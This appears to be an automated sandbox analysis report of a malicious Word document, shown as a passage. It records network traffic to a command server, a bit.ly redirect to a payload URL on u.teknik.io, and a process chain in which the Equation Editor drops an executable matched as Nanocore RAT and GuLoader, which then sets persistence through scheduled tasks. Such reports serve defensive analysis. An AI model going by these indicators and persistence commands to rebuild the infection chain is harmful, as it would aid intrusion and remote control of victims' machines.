Feb 25, 2021 07:31:42.601239920 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.601268053 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.601349115 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.605365992 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.605441093 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.605477095 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.605510950 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.605518103 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.605604887 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.606801033 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.607600927 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.607851028 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.608371019 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.609203100 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.609262943 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.610294104 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614245892 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614284992 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614315987 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.614329100 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614367008 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614377975 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.614403009 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.614451885 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.615386963 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.616695881 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.616764069 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.619045973 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.619096041 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.619133949 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.619170904 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.620342016 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.620379925 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.620399952 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.621484041 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.621561050 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.622603893 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.624505997 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.624543905 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.624569893 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.624680042 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.624726057 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.625744104 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.626605988 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.626652956 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.627473116 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.628465891 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.628536940 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.632787943 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.632832050 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.632895947 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.633260965 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.633310080 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.633351088 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.633367062 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.634732008 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.634804010 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.635576010 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.635704041 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.635745049 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.635755062 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.636243105 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.636292934 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.637994051 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.640672922 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.640721083 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.640743017 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.640755892 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.640796900 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.640801907 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.642889023 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.642966986 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.643560886 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.644596100 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.644654989 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.645915985 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.646301031 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.646362066 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.646456957 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.646497011 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.646541119 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.647203922 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.648542881 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.648591995 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.652658939 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.652702093 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.652740002 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.652755976 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.654881954 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.654925108 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.654958963 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.655327082 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.655383110 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.655518055 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.656253099 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.656311989 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.656718969 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.657270908 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.657324076 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.658555031 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.658595085 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.658642054 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.661559105 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.661662102 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.661720991 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.663132906 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.664081097 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.664125919 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.664154053 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.665427923 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.665505886 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.666495085 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.666538000 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.666574955 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.666589975 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.667531013 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.667587042 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.669471979 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.669517040 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.669554949 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.669570923 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.669590950 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.669631004 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.671247005 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.671401024 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.671449900 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.675054073 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675679922 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675719023 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675745964 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.675757885 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675795078 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675802946 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.675841093 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.675906897 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.678381920 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.678561926 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.678621054 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.680227995 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.680337906 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.680393934 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.681117058 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.681159019 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.681206942 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.681601048 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.681791067 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.681838036 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.682404041 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.861541986 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.861610889 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.863534927 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.863578081 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.863687992 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.865412951 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.865463972 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.865540028 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.866336107 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.867563009 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.867602110 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.867643118 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.869440079 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.869481087 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.869504929 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.871310949 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.871351004 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.871387959 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.873219967 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.873297930 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.875422001 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.875462055 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.875500917 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.875516891 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.877527952 CET	4488	49175	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:42.877645016 CET	49175	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:42.985450029 CET	49175	4488	192.168.2.22	194.5.98.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:29:14.461078882 CET	52197	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:14.511269093 CET	53	52197	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:14.511475086 CET	52197	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:14.561319113 CET	53	52197	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:14.812344074 CET	53099	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:14.872477055 CET	53	53099	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:14.872773886 CET	53099	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:14.932527065 CET	53	53099	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:15.402287006 CET	52838	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:15.451178074 CET	53	52838	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:15.456893921 CET	61200	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:15.514120102 CET	53	61200	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:16.026027918 CET	49548	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:16.087656021 CET	53	49548	8.8.8.8	192.168.2.22
Feb 25, 2021 07:29:16.093247890 CET	55627	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:29:16.154942989 CET	53	55627	8.8.8.8	192.168.2.22
Feb 25, 2021 07:31:07.850161076 CET	56009	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:31:07.904503107 CET	53	56009	8.8.8.8	192.168.2.22
Feb 25, 2021 07:31:08.949430943 CET	61865	53	192.168.2.22	8.8.8.8
Feb 25, 2021 07:31:09.023087978 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 07:29:14.461078882 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.511475086 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.812344074 CET	192.168.2.22	8.8.8.8	0xef41	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.872773886 CET	192.168.2.22	8.8.8.8	0xef41	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 25, 2021 07:31:07.850161076 CET	192.168.2.22	8.8.8.8	0xbe16	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Feb 25, 2021 07:31:08.949430943 CET	192.168.2.22	8.8.8.8	0xbf16	Standard query (0)	ibkebw.dm.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 07:29:14.511269093 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.511269093 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.561319113 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.561319113 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.872477055 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:29:14.872477055 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 25, 2021 07:29:14.932527065 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:29:14.932527065 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 25, 2021 07:31:07.904503107 CET	8.8.8.8	192.168.2.22	0xbe16	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:31:09.023087978 CET	8.8.8.8	192.168.2.22	0xbf16	No error (0)	ibkebw.dm.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 07:31:09.023087978 CET	8.8.8.8	192.168.2.22	0xbf16	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	67.199.248.10	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 25, 2021 07:29:14.627883911 CET	0	OUT	GET /2ZKf4aq HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 25, 2021 07:29:14.770637989 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 25 Feb 2021 06:29:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/wREzo.txt Set-Cookie: _bit=l1p6te-b37a8979adaf075f5e-00T; Domain=bit.ly; Expires=Tue, 24 Aug 2021 06:29:14 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 77 52 45 7a 6f 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2200 Parent PID: 584

General

Start time:	07:28:30
Start date:	25/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f320000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2308 Parent PID: 584

General

Start time:	07:28:32
Start date:	25/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 69577.exe PID: 2680 Parent PID: 2308

General

Start time:	07:28:35
Start date:	25/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	A6AD1C3046A3CF0C6992507F2886AAB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 28%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2916 Parent PID: 2680

General

Start time:	07:30:17
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0xbf0000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 2488 Parent PID: 2680

General

Start time:	07:30:22
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0xbf0000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 3060 Parent PID: 2488

General

Start time:	07:30:28
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
Imagebase:	0x2c0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2276 Parent PID: 2488

General

Start time:	07:30:29
Start date:	25/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
Imagebase:	0x2c0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskeng.exe PID: 2272 Parent PID: 860

General

Start time:	07:30:29
Start date:	25/02/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff9c0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 1904 Parent PID: 2272

General

Start time:	07:30:30
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Imagebase:	0xbf0000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: smtpsvc.exe PID: 2348 Parent PID: 2272

General

Start time:	07:30:31
Start date:	25/02/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0xd90000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: filename1.exe PID: 1552 Parent PID: 1388

General

Start time:	07:30:36
Start date:	25/02/2021
Path:	C:\Users\user\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\subfolder1\filename1.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	A6AD1C3046A3CF0C6992507F2886AAB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 28%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: smtpsvc.exe PID: 2560 Parent PID: 1388

General

Start time:	07:30:45
Start date:	25/02/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
